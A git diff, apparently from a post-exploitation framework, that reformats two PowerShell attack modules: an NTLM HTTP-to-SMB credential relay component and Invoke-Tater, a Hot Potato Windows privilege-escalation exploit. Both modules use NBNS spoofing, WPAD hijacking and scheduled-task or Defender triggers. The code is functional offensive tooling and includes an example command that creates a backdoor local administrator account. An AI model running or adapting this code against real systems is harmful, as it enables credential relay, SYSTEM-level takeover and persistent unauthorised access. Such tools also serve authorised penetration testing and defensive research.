+                                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")])
                                         $inveigh.SMB_relay_active_step = 4
                                         SMBRelayExecute $SMB_relay_socket $SMB_user_ID          
                                     }
                                     else
                                     {
-                                        $inveigh.console_queue.add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
-                                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")])
-                                        $inveigh.SMBRelay_failed_list += "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget"
+                                        $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
+                                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")])
+                                        $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
                                         $inveigh.SMB_relay_active_step = 0
                                         $SMB_relay_socket.Close()
                                     }
+
                                 }
                                 else
                                 {
-                                    $inveigh.console_queue.add("NTLMv1 SMB relay not yet supported")
-                                    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - NTLMv1 relay not yet supported")])
+                                    $inveigh.console_queue.Add("NTLMv1 SMB relay not yet supported")
+                                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NTLMv1 relay not yet supported")])
                                     $inveigh.SMB_relay_active_step = 0
                                     $SMB_relay_socket.Close()
                                 }
+
                             }
                             else
                             {
-                                $inveigh.console_queue.add("Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")
-                                $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")])
+                                $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")
+                                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")])
                                 $inveigh.SMB_relay_active_step = 0
                                 $SMB_relay_socket.Close()
                             }
+
                         }
                         else
                         {
-                            $inveigh.console_queue.add("Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")
-                            $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")])
+                            $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_user_string appears to be a machine account")
+                            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")])
                             $inveigh.SMB_relay_active_step = 0
                             $SMB_relay_socket.Close()
                         }
+
                     }
                     else
                     {
-                        $inveigh.console_queue.add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")])
+                        $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on SMB relay username list")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")])
                         $inveigh.SMB_relay_active_step = 0
                         $SMB_relay_socket.Close()
                     }
+
                 }
+
             }
             else
             {
@@ -1244,13 +1375,12 @@ $HTTP_scriptblock =
         
         }
         
-        [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message)
-        $inveigh.response.ContentLength64 = $HTTP_buffer.length
+        [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message)
+        $inveigh.response.ContentLength64 = $HTTP_buffer.Length
         $inveigh.response.AddHeader("WWW-Authenticate",$NTLM)
         $HTTP_stream = $inveigh.response.OutputStream
-        $HTTP_stream.write($HTTP_buffer, 0, $HTTP_buffer.length)
+        $HTTP_stream.Write($HTTP_buffer,0,$HTTP_buffer.Length)
         $HTTP_stream.close()
-
     }
 
     $inveigh.HTTP_listener.Stop()
@@ -1263,25 +1393,27 @@ $control_relay_scriptblock =
 
     if($RunTime)
     {    
-        $control_timeout = new-timespan -Minutes $RunTime
-        $control_stopwatch = [diagnostics.stopwatch]::StartNew()
+        $control_timeout = New-Timespan -Minutes $RunTime
+        $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
     }
        
     while ($inveigh.relay_running)
     {
 
         if($RunTime)
-        {    
-            if($control_stopwatch.elapsed -ge $control_timeout)
+        {
+
+            if($control_stopwatch.Elapsed -ge $control_timeout)
             {
+
                 if($inveigh.HTTP_listener.IsListening)
                 {
                     $inveigh.HTTP_listener.Stop()
                     $inveigh.HTTP_listener.Close()
                 }
             
-                $inveigh.console_queue.add("Inveigh Relay exited due to run time at $(Get-Date -format 's')")
-                $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")])
+                $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")])
                 Start-Sleep -m 5
                 $inveigh.relay_running = $false
 
@@ -1293,33 +1425,38 @@ $control_relay_scriptblock =
                     {
                         $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
                         $certificate_store.Open('ReadWrite')
-                        $certificate = $certificate_store.certificates.find("FindByThumbprint",$inveigh.certificate_thumbprint,$false)[0]
+                        $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$false)[0]
                         $certificate_store.Remove($certificate)
                         $certificate_store.Close()
                     }
                     catch
                     {
+
                         if($inveigh.status_output)
                         {
-                            $inveigh.console_queue.add("SSL Certificate Deletion Error - Remove Manually")
+                            $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually")
                         }
 
-                        $inveigh.log.add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
+                        $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
 
                         if($inveigh.file_output)
                         {
-                            "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually"| Out-File $Inveigh.log_out_file -Append   
+                            "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append   
                         }
+                    
                     }
+                
                 }     
 
                 $inveigh.HTTP = $false
                 $inveigh.HTTPS = $false
             }
+
         }
 
         if($inveigh.file_output -and (!$inveigh.running -or !$inveigh.bruteforce_running))
         {
+
             while($inveigh.log_file_queue.Count -gt 0)
             {
                 $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
@@ -1343,14 +1480,16 @@ $control_relay_scriptblock =
                 $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
                 $inveigh.cleartext_file_queue.RemoveRange(0,1)
             }
+        
         }
 
         Start-Sleep -m 5
     }
+
  }
 
-# HTTP/HTTPS Listener Startup Function 
-Function HTTPListener()
+# HTTP/HTTPS Listener Startup function 
+function HTTPListener()
 {
     $inveigh.HTTP_listener = New-Object System.Net.HttpListener
 
@@ -1366,10 +1505,10 @@ Function HTTPListener()
 
     $inveigh.HTTP_listener.AuthenticationSchemes = "Anonymous" 
     $inveigh.HTTP_listener.Start()
-    $HTTP_runspace = [runspacefactory]::CreateRunspace()
+    $HTTP_runspace = [RunspaceFactory]::CreateRunspace()
     $HTTP_runspace.Open()
     $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
-    $HTTP_powershell = [powershell]::Create()
+    $HTTP_powershell = [PowerShell]::Create()
     $HTTP_powershell.Runspace = $HTTP_runspace
     $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
     $HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
@@ -1378,18 +1517,17 @@ Function HTTPListener()
     $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
     $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument(
         $SMBRelayTarget).AddArgument($SMBRelayCommand).AddArgument($SMBRelayUsernames).AddArgument(
-        $SMBRelayAutoDisable).AddArgument($SMBRelayNetworkTimeout).AddArgument(
-        $MachineAccounts).AddArgument($WPADAuth) > $null
+        $SMBRelayAutoDisable).AddArgument($SMBRelayNetworkTimeout).AddArgument($WPADAuth) > $null
     $HTTP_powershell.BeginInvoke() > $null
 }
 
-# Control Relay Startup Function
-Function ControlRelayLoop()
+# Control Relay Startup function
+function ControlRelayLoop()
 {
-    $control_relay_runspace = [runspacefactory]::CreateRunspace()
+    $control_relay_runspace = [RunspaceFactory]::CreateRunspace()
     $control_relay_runspace.Open()
     $control_relay_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
-    $control_relay_powershell = [powershell]::Create()
+    $control_relay_powershell = [PowerShell]::Create()
     $control_relay_powershell.Runspace = $control_relay_runspace
     $control_relay_powershell.AddScript($shared_basic_functions_scriptblock) > $null
     $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($RunTime) > $null
@@ -1413,66 +1551,82 @@ if(!$inveigh.running -and $inveigh.console_output)
 
     :console_loop while($inveigh.relay_running -and $inveigh.console_output)
     {
+
         while($inveigh.console_queue.Count -gt 0)
         {
+
             if($inveigh.output_stream_only)
             {
-                write-output($inveigh.console_queue[0] + $inveigh.newline)
+                Write-Output($inveigh.console_queue[0] + $inveigh.newline)
                 $inveigh.console_queue.RemoveRange(0,1)
             }
             else
             {
+
                 switch -wildcard ($inveigh.console_queue[0])
                 {
+
                     "Inveigh *exited *"
                     {
-                        write-warning $inveigh.console_queue[0]
+                        Write-Warning $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     "* written to *"
                     {
+
                         if($inveigh.file_output)
                         {
-                            write-warning $inveigh.console_queue[0]
+                            Write-Warning $inveigh.console_queue[0]
                         }
 
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     "* for relay *"
                     {
-                        write-warning $inveigh.console_queue[0]
+                        Write-Warning $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     "*SMB relay *"
                     {
-                        write-warning $inveigh.console_queue[0]
+                        Write-Warning $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     "* local administrator *"
                     {
-                        write-warning $inveigh.console_queue[0]
+                        Write-Warning $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     default
                     {
-                        write-output $inveigh.console_queue[0]
+                        Write-Output $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
-                } 
-            }   
+
+                }
+
+            }
+
         }
 
         if($inveigh.console_input)
         {
-            if([console]::KeyAvailable)
+
+            if([Console]::KeyAvailable)
             {
                 $inveigh.console_output = $false
                 BREAK console_loop
             }
+        
         }
 
         Start-Sleep -m 5
     }
+
 }
 
 }

--- a/data/module_source/privesc/Invoke-Tater.ps1
+++ b/data/module_source/privesc/Invoke-Tater.ps1
@@ -1,29 +1,34 @@
-Function Invoke-Tater
+function Invoke-Tater
 {
 <#
 .SYNOPSIS
-Invoke-Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit from @breenmachine and @foxglovesec.
+Invoke-Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit from
+@breenmachine and @foxglovesec.
 
 .DESCRIPTION
-Invoke-Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation with functionality similiar to Potato.exe available at https://github.com/foxglovesec/Potato.
+Invoke-Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation with functionality
+similiar to Potato.exe available at https://github.com/foxglovesec/Potato.
 
 .PARAMETER IP
-Specify a specific local IP address. An IP address will be selected automatically if this parameter is not used. 
+Specify a specific local IP address. An IP address will be selected automatically if this parameter is not used.
 
 .PARAMETER SpooferIP
-Specify an IP address for NBNS spoofing. This is needed when using two hosts to get around an in-use port 80 on the privesc target. 
+Specify an IP address for NBNS spoofing. This is needed when using two hosts to get around an in-use port 80 on
+the privesc target.
 
 .PARAMETER Command
 Command to execute as SYSTEM on the localhost. Use PowerShell character escapes where necessary.
 
 .PARAMETER NBNS
-Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofing. 
+Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofing.
 
 .PARAMETER NBNSLimit
-Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofer limiting to stop NBNS spoofing while hostname is resolving correctly.
+Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofer limiting to stop NBNS spoofing while hostname is
+resolving correctly.
 
 .PARAMETER ExhaustUDP
-Default = Disabled: (Y/N) Enable/Disable UDP port exhaustion to force all DNS lookups to fail in order to fallback to NBNS resolution.
+Default = Disabled: (Y/N) Enable/Disable UDP port exhaustion to force all DNS lookups to fail in order to fallback
+to NBNS resolution.
 
 .PARAMETER HTTPPort
 Default = 80: Specify a TCP port for the HTTP listener and redirect response.
@@ -32,25 +37,30 @@ Default = 80: Specify a TCP port for the HTTP listener and redirect response.
 Default = WPAD: Hostname to spoof. WPAD.DOMAIN.TLD may be required by Windows Server 2008.
 
 .PARAMETER WPADDirectHosts
-Comma separated list of hosts to list as direct in the wpad.dat file. Note that localhost is always listed as direct.
+Comma separated list of hosts to list as direct in the wpad.dat file. Note that localhost is always listed as
+direct.
 
 .PARAMETER WPADPort
 Default = 80: Specify a proxy server port to be included in a the wpad.dat file.
 
 .PARAMETER Trigger
-Default = 1: Trigger type to use in order to trigger HTTP to SMB relay. 0 = None, 1 = Windows Defender Signature Update, 2 = Windows 10 Webclient/Scheduled Task
+Default = 1: Trigger type to use in order to trigger HTTP to SMB relay. 0 = None, 1 = Windows Defender Signature
+Update, 2 = Windows 10 Webclient/Scheduled Task
 
 .PARAMETER TaskDelete
-Default = Tater: (Y/N) Enable/Disable scheduled task deletion for trigger 2. If enabled, a random string will be added to the taskname to avoid failures after multiple trigger 2 runs. 
+Default = Tater: (Y/N) Enable/Disable scheduled task deletion for trigger 2. If enabled, a random string will be
+added to the taskname to avoid failures after multiple trigger 2 runs.
 
 .PARAMETER Taskname
-Default = Tater: Scheduled task name to use with trigger 2. If you observe that Tater does not work after multiple trigger 2 runs, try changing the taskname. 
+Default = Tater: Scheduled task name to use with trigger 2. If you observe that Tater does not work after multiple
+trigger 2 runs, try changing the taskname.
 
 .PARAMETER RunTime
 (Integer) Set the run time duration in minutes.
 
 .PARAMETER ConsoleOutput
-Default = Enabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
+Default = Enabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
+ensure that it doesn't hang the shell.
 
 .PARAMETER StatusOutput
 Default = Enabled: (Y/N) Enable/Disable startup status messages.
@@ -59,7 +69,8 @@ Default = Enabled: (Y/N) Enable/Disable startup status messages.
 Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
 
 .PARAMETER Tool
-Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire  
+Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's
+Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
 
 .EXAMPLE
 Invoke-Tater -Command "net user Tater Spring2016 /add && net localgroup administrators Tater /add"
@@ -68,27 +79,28 @@ Invoke-Tater -Command "net user Tater Spring2016 /add && net localgroup administ
 https://github.com/Kevin-Robertson/Tater
 #>
 
-# Default parameter values can be modified in this section 
+# Default parameter values can be modified in this section
+[CmdletBinding()]
 param
 ( 
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$NBNS="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$NBNSLimit="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ExhaustUDP="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ConsoleOutput="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$StatusOutput="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$TaskDelete="Y",
-    [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0",
-    [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$IP="",
-    [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SpooferIP="127.0.0.1",
-    [parameter(Mandatory=$false)][int]$HTTPPort="80",
-    [parameter(Mandatory=$false)][int]$RunTime="",
-    [parameter(Mandatory=$false)][ValidateSet(0,1,2)][int]$Trigger="1",
-    [parameter(Mandatory=$true)][string]$Command = "",
-    [parameter(Mandatory=$false)][string]$Hostname = "WPAD",  
-    [parameter(Mandatory=$false)][string]$Taskname = "Tater",
-    [parameter(Mandatory=$false)][string]$WPADPort="80",
-    [parameter(Mandatory=$false)][array]$WPADDirectHosts,
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSLimit="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ExhaustUDP="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$TaskDelete="Y",
+    [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_ })][String]$IP="",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_ })][String]$SpooferIP="127.0.0.1",
+    [parameter(Mandatory=$false)][Int]$HTTPPort="80",
+    [parameter(Mandatory=$false)][Int]$RunTime="",
+    [parameter(Mandatory=$false)][ValidateSet(0,1,2)][Int]$Trigger="1",
+    [parameter(Mandatory=$true)][String]$Command="",
+    [parameter(Mandatory=$false)][String]$Hostname="WPAD",  
+    [parameter(Mandatory=$false)][String]$Taskname="Tater",
+    [parameter(Mandatory=$false)][String]$WPADPort="80",
+    [parameter(Mandatory=$false)][Array]$WPADDirectHosts,
     [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
 )
 
@@ -104,15 +116,15 @@ if(!$IP)
 
 if(!$Command)
 {
-    Throw "You must specify an -Command if enabling -SMBRelay"
+    throw "You must specify an -Command if enabling -SMBRelay"
 }
 
 if($tater.running)
 {
-    Throw "Invoke-Tater is already running, use Stop-Tater"
+    throw "Invoke-Tater is already running, use Stop-Tater"
 }
 
-$global:tater = [hashtable]::Synchronized(@{})
+$global:tater = [HashTable]::Synchronized(@{})
 
 $tater.running = $true
 $tater.console_queue = New-Object System.Collections.ArrayList
@@ -121,7 +133,7 @@ $tater.console_input = $true
 $tater.SMB_relay_active_step = 0
 $tater.trigger = $Trigger
 
-if($StatusOutput -eq 'y')
+if($StatusOutput -eq 'Y')
 {
     $tater.status_output = $true
 }
@@ -156,152 +168,160 @@ if($Trigger -eq 2)
 }
 
 # Write startup messages
-$tater.status_queue.add("$(Get-Date -format 's') - Tater (Hot Potato Privilege Escalation) started")|Out-Null
-$tater.status_queue.add("Local IP Address = $IP") |Out-Null
+$tater.status_queue.Add("$(Get-Date -format 's') - Tater (Hot Potato Privilege Escalation) started") > $null
+$tater.status_queue.Add("Local IP Address = $IP") > $null
 
 if($HTTPPort -ne 80)
 {
-    $tater.status_queue.add("HTTP Port = $HTTPPort")|Out-Null
+    $tater.status_queue.Add("HTTP Port = $HTTPPort") > $null
 }
 
-if($NBNS -eq 'y')
+if($NBNS -eq 'Y')
 {
-    $tater.status_queue.add("Spoofing Hostname = $Hostname")|Out-Null
+    $tater.status_queue.Add("Spoofing Hostname = $Hostname") > $null
 
-    if($NBNSLimit -eq 'n')
+    if($NBNSLimit -eq 'N')
     {
-        $tater.status_queue.add("NBNS Bruteforce Spoofer Limiting Disabled")|Out-Null
+        $tater.status_queue.Add("NBNS Bruteforce Spoofer Limiting Disabled") > $null
     }
+
 }
 else
 {
-    $tater.status_queue.add("NBNS Bruteforce Spoofing Disabled")|Out-Null
+    $tater.status_queue.Add("NBNS Bruteforce Spoofing Disabled") > $null
 }
 
 if($SpooferIP -ne '127.0.0.1')
 {
-    $tater.status_queue.add("NBNS Spoofer IP Address = $SpooferIP")|Out-Null
+    $tater.status_queue.Add("NBNS Spoofer IP Address = $SpooferIP") > $null
 }
 
 if($WPADDirectHosts.Count -gt 0)
 {
-    $tater.status_queue.add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",")|Out-Null
+    $tater.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null
 }
 
 if($WPADPort -ne 80)
 {
-    $tater.status_queue.add("WPAD Port = $WPADPort")|Out-Null
+    $tater.status_queue.Add("WPAD Port = $WPADPort") > $null
 }
 
-if($ExhaustUDP -eq 'y')
+if($ExhaustUDP -eq 'Y')
 {
-    $tater.status_queue.add("UDP Port Exhaustion Enabled")|Out-Null
+    $tater.status_queue.Add("UDP Port Exhaustion Enabled") > $null
 }
 
 if($Trigger -eq 0)
 {
-    $tater.status_queue.add("Relay Trigger Disabled")|Out-Null
+    $tater.status_queue.Add("Relay Trigger Disabled") > $null
 }
 elseif($Trigger -eq 1)
 {
-    $tater.status_queue.add("Windows Defender Trigger Enabled")|Out-Null
+    $tater.status_queue.Add("Windows Defender Trigger Enabled") > $null
 }
 elseif($Trigger -eq 2)
 {
-    $tater.status_queue.add("Scheduled Task Trigger Enabled")|Out-Null
+    $tater.status_queue.Add("Scheduled Task Trigger Enabled") > $null
     $tater.taskname = $Taskname -replace " ","_"
     
-    if($TaskDelete -eq 'y')
+    if($TaskDelete -eq 'Y')
     {
-        $tater.status_queue.add("Scheduled Task Prefix = $Taskname")|Out-Null 
-        $tater.status_queue.add("Scheduled Task Deletion Enabled")|Out-Null
+        $tater.status_queue.Add("Scheduled Task Prefix = $Taskname") > $null
+        $tater.status_queue.Add("Scheduled Task Deletion Enabled") > $null
         $tater.task_delete = $true
     }
     else
     {
-        $tater.status_queue.add("Scheduled Task = $Taskname")|Out-Null
-        $tater.status_queue.add("Scheduled Task Deletion Disabled")|Out-Null
+        $tater.status_queue.Add("Scheduled Task = $Taskname") > $null
+        $tater.status_queue.Add("Scheduled Task Deletion Disabled") > $null
         $tater.task_delete = $false
     }
+
 }
 
-if($ConsoleOutput -eq 'y')
+if($ConsoleOutput -eq 'Y')
 {
-    $tater.status_queue.add("Real Time Console Output Enabled")|Out-Null
+    $tater.status_queue.Add("Real Time Console Output Enabled") > $null
     $tater.console_output = $true
 }
 else
 {
+
     if($tater.tool -eq 1)
     {
-        $tater.status_queue.add("Real Time Console Output Disabled Due To External Tool Selection")|Out-Null
+        $tater.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null
     }
     else
     {
-        $tater.status_queue.add("Real Time Console Output Disabled")|Out-Null
+        $tater.status_queue.Add("Real Time Console Output Disabled") > $null
     }
+
 }
 
 if($RunTime -eq '1')
 {
-    $tater.status_queue.add("Run Time = $RunTime Minute")|Out-Null
+    $tater.status_queue.Add("Run Time = $RunTime Minute") > $null
 }
 elseif($RunTime -gt 1)
 {
-    $tater.status_queue.add("Run Time = $RunTime Minutes")|Out-Null
+    $tater.status_queue.Add("Run Time = $RunTime Minutes") > $null
 }
 
-if($ShowHelp -eq 'y')
+if($ShowHelp -eq 'Y')
 {
-    $tater.status_queue.add("Run Stop-Tater to stop Tater early")|Out-Null
+    $tater.status_queue.Add("Run Stop-Tater to stop Tater early") > $null
         
     if($tater.console_output)
     {
-        $tater.status_queue.add("Use Get-Command -Noun Tater* to show available functions")|Out-Null
-        $tater.status_queue.add("Press any key to stop real time console output")|Out-Null
-        $tater.status_queue.add("")|Out-Null
+        $tater.status_queue.Add("Use Get-Command -Noun Tater* to show available functions") > $null
+        $tater.status_queue.Add("Press any key to stop real time console output") > $null
+        $tater.status_queue.Add("") > $null
     }
+
 }
 
 if($tater.status_output)
 {
+
     while($tater.status_queue.Count -gt 0)
     {
         write-output($tater.status_queue[0] + $tater.newline)
         $tater.status_queue.RemoveRange(0,1)
     }
+
 }
 
 $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
-$process_ID = [BitConverter]::ToString([BitConverter]::GetBytes($process_ID))
+$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
 $process_ID = $process_ID -replace "-00-00",""
-[Byte[]]$tater.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[CHAR][CONVERT]::toint16($_,16)}
+[Byte[]] $tater.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
 
 # Begin ScriptBlocks
 
 # Shared Basic Functions ScriptBlock
 $shared_basic_functions_scriptblock =
 {
-    Function DataLength
+
+    function DataLength
     {
-        param ([int]$length_start,[byte[]]$string_extract_data)
+        param ([Int]$length_start,[Byte[]]$string_extract_data)
 
         $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0)
         return $string_length
     }
 
-    Function DataToString
+    function DataToString
     {
-        param ([int]$string_length,[int]$string2_length,[int]$string3_length,[int]$string_start,[byte[]]$string_extract_data)
+        param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data)
 
-        $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length-1)])
+        $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start + $string2_length + $string3_length)..($string_start + $string_length + $string2_length + $string3_length - 1)])
         $string_data = $string_data -replace "-00",""
-        $string_data = $string_data.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
         return $string_extract
     }
 
-    Function DnsFlushResolverCache
+    function DnsFlushResolverCache
     {
         $DNS_member_definition = @'
             [DllImport("dnsapi.dll", EntryPoint="DnsFlushResolverCache")]
@@ -317,9 +337,9 @@ $shared_basic_functions_scriptblock =
         [DNSAPI.Flush]::FlushResolverCache()
     }
 
-    Function StopTater
+    function StopTater
     {
-        $tater.console_queue.add("$(Get-Date -format 's') - Stopping HTTP listener")
+        $tater.console_queue.Add("$(Get-Date -format 's') - Stopping HTTP listener")
         $tater.HTTP_client.Close()
         start-sleep -s 1
         $tater.HTTP_listener.server.blocking = $false
@@ -329,66 +349,76 @@ $shared_basic_functions_scriptblock =
         $tater.HTTP_listener.Stop()
 
         if($tater.SMBRelay_success)
-        {  
+        {
+          
             if($tater.trigger -eq 2)
             {
+
                 if($tater.task_delete -and $tater.task_added)
                 {
                     $scheduled_task_deleted = $false
                     $schedule_service = new-object -com("Schedule.Service")
-                    $schedule_service.connect()
-                    $scheduled_task_folder = $schedule_service.getfolder("\")
-                    $scheduled_task_list = $scheduled_task_folder.gettasks(1)
+                    $schedule_service.Connect()
+                    $scheduled_task_folder = $schedule_service.GetFolder("\")
+                    $scheduled_task_list = $scheduled_task_folder.GetTasks(1)
 
                     foreach($scheduled_task in $scheduled_task_list)
                     {
+
                         if($scheduled_task.name -eq $tater.task)
                         {
                             $scheduled_task_folder.DeleteTask($scheduled_task.name,0)
                         }
+                    
                     }
 
-                    ForEach($scheduled_task in $scheduled_task_list)
+                    foreach($scheduled_task in $scheduled_task_list)
                     {
+
                         if($scheduled_task.name -eq $tater.task)
                         {
                             $scheduled_task_deleted = $true
                         }
+                    
                     }
 
                     if($scheduled_task_deleted)
                     {
-                        $tater.console_queue.add("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deleted successfully") 
+                        $tater.console_queue.Add("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deleted successfully") 
                     }
                     else
                     {
-                        $tater.console_queue.add("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deletion failed, remove manually")
+                        $tater.console_queue.Add("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deletion failed, remove manually")
                     }
+
                 }
                 elseif($tater.task_added)
                 {
-                    $tater.console_queue.add("$(Get-Date -format 's') - Remove scheduled task " + $tater.task + " manually when finished")
